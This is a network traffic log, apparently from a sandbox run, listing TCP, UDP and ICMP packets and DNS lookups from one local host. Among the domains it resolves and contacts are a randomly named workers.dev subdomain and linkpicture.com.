Apr 29, 2024 01:11:55.070549011 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.070648909 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.071356058 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.071367979 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.293847084 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.294256926 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.294285059 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.294627905 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.294981003 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.295043945 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.295111895 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.306544065 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.306809902 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.306828976 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.307949066 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.308444023 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.308561087 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.340123892 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.345951080 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.362231970 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.564162970 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564210892 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564235926 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564260960 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564281940 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564302921 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564349890 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.564349890 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.564368010 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564400911 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.564594030 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564661026 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.564702034 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.771620035 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.771651030 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.778023958 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.820122004 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.900748014 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.900882959 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.900938988 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.900954962 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901046991 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901087046 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.901093006 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901212931 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901257992 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.901262999 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901367903 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901411057 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.901417017 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901511908 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:56.901557922 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.917491913 CEST	49768	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:56.917505026 CEST	443	49768	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.088037014 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.088072062 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.088138103 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.088349104 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.088360071 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.317867041 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.318169117 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.318202019 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.318531036 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.318913937 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.318973064 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.319215059 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.360122919 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587389946 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587455988 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587495089 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.587508917 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587553024 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587590933 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587605000 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.587611914 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587636948 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587650061 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.587654114 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.587699890 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.587970972 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.588150024 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.588208914 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.588485956 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.588502884 CEST	443	49769	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:57.588510990 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.588543892 CEST	49769	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:57.601166010 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:57.601249933 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.601317883 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:57.601669073 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:57.601697922 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.832498074 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.832762003 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:57.832803011 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.833148956 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.833564997 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:57.833635092 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:57.833745956 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:57.876142025 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105221033 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105257034 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105277061 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105298996 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105298996 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.105318069 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105328083 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105335951 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.105365992 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.105376959 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105504990 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105551958 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.105571985 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105592966 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.105640888 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.107388020 CEST	49770	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.107434034 CEST	443	49770	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.110649109 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.110692024 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.110745907 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.111325026 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.111337900 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.344290018 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.344578981 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.344595909 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.344938040 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.345382929 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.345382929 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.345444918 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.387520075 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.614700079 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614749908 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614789963 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614860058 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614859104 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.614881992 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614903927 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614921093 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.614923000 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.614955902 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.614962101 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.615214109 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.615242004 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.615309000 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.615948915 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.615957022 CEST	443	49771	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:58.615983963 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.616255999 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:58.616436958 CEST	49771	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:12:04.732795000 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:04.732836008 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:04.732906103 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:04.733738899 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:04.733751059 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.172322989 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.172410011 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.185153008 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.185173988 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.185420990 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.209482908 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.252156973 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.600244045 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.600261927 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.600332022 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.600490093 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.600490093 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.600522995 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.600538969 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.603725910 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.677833080 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.677833080 CEST	49772	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:12:05.677869081 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:05.677882910 CEST	443	49772	13.85.23.86	192.168.2.4
Apr 29, 2024 01:12:16.499177933 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:16.499206066 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:16.499289989 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:16.499566078 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:16.499581099 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:16.735619068 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:16.735892057 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:16.735903978 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:16.736233950 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:16.736593008 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:16.736675978 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:16.778635979 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:21.255562067 CEST	49723	80	192.168.2.4	72.21.81.240
Apr 29, 2024 01:12:21.258188963 CEST	49724	80	192.168.2.4	72.21.81.240
Apr 29, 2024 01:12:21.365258932 CEST	80	49723	72.21.81.240	192.168.2.4
Apr 29, 2024 01:12:21.365323067 CEST	49723	80	192.168.2.4	72.21.81.240
Apr 29, 2024 01:12:21.367785931 CEST	80	49724	72.21.81.240	192.168.2.4
Apr 29, 2024 01:12:21.367849112 CEST	49724	80	192.168.2.4	72.21.81.240
Apr 29, 2024 01:12:26.757661104 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:26.757738113 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:26.757849932 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:26.904660940 CEST	49774	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:12:26.904675007 CEST	443	49774	142.250.191.196	192.168.2.4
Apr 29, 2024 01:12:40.195732117 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.195822954 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.196640015 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.196957111 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.196993113 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.431245089 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.431617022 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.431655884 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.432018042 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.432492971 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.432559967 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.432593107 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.473244905 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.473284006 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.668325901 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.668402910 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.669116974 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.669116974 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.669157028 CEST	443	49775	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.669182062 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.669197083 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.669208050 CEST	49775	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.669275999 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.669504881 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.669517994 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.893599987 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.893934965 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.893963099 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.894304037 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.900365114 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.900446892 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:40.900970936 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:40.948117971 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:41.130287886 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:41.130366087 CEST	443	49776	35.190.80.1	192.168.2.4
Apr 29, 2024 01:12:41.130507946 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:41.131724119 CEST	49776	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:12:41.131762028 CEST	443	49776	35.190.80.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 01:11:12.290168047 CEST	53	64494	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:12.413011074 CEST	51242	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:12.413202047 CEST	50616	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:12.523982048 CEST	53	51242	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:12.524162054 CEST	53	51653	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:12.524252892 CEST	53	50616	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:13.162568092 CEST	53	63901	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:32.674144030 CEST	138	138	192.168.2.4	192.168.2.255
Apr 29, 2024 01:11:32.987843037 CEST	53	61705	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:38.784972906 CEST	51731	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:38.785130978 CEST	51518	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:38.900671959 CEST	53	51731	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:38.902087927 CEST	53	51518	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:39.558073044 CEST	49722	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:39.558522940 CEST	56708	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:39.672589064 CEST	53	49722	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:39.673013926 CEST	53	56708	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:39.705831051 CEST	53	63010	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:40.181934118 CEST	51137	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:40.182086945 CEST	54388	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:40.292766094 CEST	53	54388	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:40.292906046 CEST	53	51137	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:40.954976082 CEST	59785	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:40.954976082 CEST	63149	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:41.074312925 CEST	53	59785	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:41.074820042 CEST	53	63149	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:42.269882917 CEST	55189	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:42.270090103 CEST	62628	53	192.168.2.4	1.1.1.1
Apr 29, 2024 01:11:42.385658026 CEST	53	55189	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:42.387295008 CEST	53	62628	1.1.1.1	192.168.2.4
Apr 29, 2024 01:11:54.256616116 CEST	53	50385	1.1.1.1	192.168.2.4
Apr 29, 2024 01:12:12.251461029 CEST	53	54495	1.1.1.1	192.168.2.4
Apr 29, 2024 01:12:19.445502996 CEST	53	63779	1.1.1.1	192.168.2.4
Apr 29, 2024 01:12:41.243273020 CEST	53	59658	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 29, 2024 01:11:42.385720968 CEST	192.168.2.4	1.1.1.1	c219	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 29, 2024 01:11:12.413011074 CEST	192.168.2.4	1.1.1.1	0xf2d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:12.413202047 CEST	192.168.2.4	1.1.1.1	0x7cb6	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 29, 2024 01:11:38.784972906 CEST	192.168.2.4	1.1.1.1	0x77e6	Standard query (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:38.785130978 CEST	192.168.2.4	1.1.1.1	0x3ae	Standard query (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev	65	IN (0x0001)	false
Apr 29, 2024 01:11:39.558073044 CEST	192.168.2.4	1.1.1.1	0xbb05	Standard query (0)	www.linkpicture.com	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:39.558522940 CEST	192.168.2.4	1.1.1.1	0x754d	Standard query (0)	www.linkpicture.com	65	IN (0x0001)	false
Apr 29, 2024 01:11:40.181934118 CEST	192.168.2.4	1.1.1.1	0x1034	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:40.182086945 CEST	192.168.2.4	1.1.1.1	0xf18b	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Apr 29, 2024 01:11:40.954976082 CEST	192.168.2.4	1.1.1.1	0x182d	Standard query (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:40.954976082 CEST	192.168.2.4	1.1.1.1	0x6dd2	Standard query (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev	65	IN (0x0001)	false
Apr 29, 2024 01:11:42.269882917 CEST	192.168.2.4	1.1.1.1	0x2c07	Standard query (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:42.270090103 CEST	192.168.2.4	1.1.1.1	0xa059	Standard query (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 29, 2024 01:11:12.523982048 CEST	1.1.1.1	192.168.2.4	0xf2d	No error (0)	www.google.com		142.250.191.196	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:12.524252892 CEST	1.1.1.1	192.168.2.4	0x7cb6	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 29, 2024 01:11:38.900671959 CEST	1.1.1.1	192.168.2.4	0x77e6	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev		104.21.55.4	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:38.900671959 CEST	1.1.1.1	192.168.2.4	0x77e6	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev		172.67.143.195	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:38.902087927 CEST	1.1.1.1	192.168.2.4	0x3ae	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev			65	IN (0x0001)	false
Apr 29, 2024 01:11:39.538748980 CEST	1.1.1.1	192.168.2.4	0xd963	No error (0)	shed.dual-low.part-0023.t-0009.t-msedge.net	part-0023.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 29, 2024 01:11:39.538748980 CEST	1.1.1.1	192.168.2.4	0xd963	No error (0)	part-0023.t-0009.t-msedge.net		13.107.246.51	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:39.538748980 CEST	1.1.1.1	192.168.2.4	0xd963	No error (0)	part-0023.t-0009.t-msedge.net		13.107.213.51	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:39.672589064 CEST	1.1.1.1	192.168.2.4	0xbb05	No error (0)	www.linkpicture.com		104.21.235.181	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:39.672589064 CEST	1.1.1.1	192.168.2.4	0xbb05	No error (0)	www.linkpicture.com		104.21.235.182	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:39.673013926 CEST	1.1.1.1	192.168.2.4	0x754d	No error (0)	www.linkpicture.com			65	IN (0x0001)	false
Apr 29, 2024 01:11:40.292906046 CEST	1.1.1.1	192.168.2.4	0x1034	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:40.324960947 CEST	1.1.1.1	192.168.2.4	0x9e17	No error (0)	shed.dual-low.part-0023.t-0009.t-msedge.net	part-0023.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 29, 2024 01:11:40.324960947 CEST	1.1.1.1	192.168.2.4	0x9e17	No error (0)	part-0023.t-0009.t-msedge.net		13.107.246.51	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:40.324960947 CEST	1.1.1.1	192.168.2.4	0x9e17	No error (0)	part-0023.t-0009.t-msedge.net		13.107.213.51	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:41.074312925 CEST	1.1.1.1	192.168.2.4	0x182d	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev		104.21.55.4	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:41.074312925 CEST	1.1.1.1	192.168.2.4	0x182d	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev		172.67.143.195	A (IP address)	IN (0x0001)	false
